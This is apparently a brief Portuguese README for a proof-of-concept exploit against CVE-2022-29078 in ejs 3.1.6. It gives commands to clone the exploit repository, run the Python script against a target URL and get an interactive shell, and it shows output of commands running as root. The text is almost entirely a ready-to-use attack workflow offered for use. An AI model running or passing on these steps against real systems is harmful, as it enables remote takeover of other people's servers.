
Exploit de prova de conceito para CVE-2022-29078 (ejs 3.1.6) possibilitando execução remota de comandos através de um script Python. Aceita uma URL de destino e fornece um shell interativo.
PoC simples para CVE-2022-29078 (vuln ejs 3.1.6)
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
Aparecerá um prompt para executar comandos
$ id
uid=0(root) gid=0(root) groupes=0(root)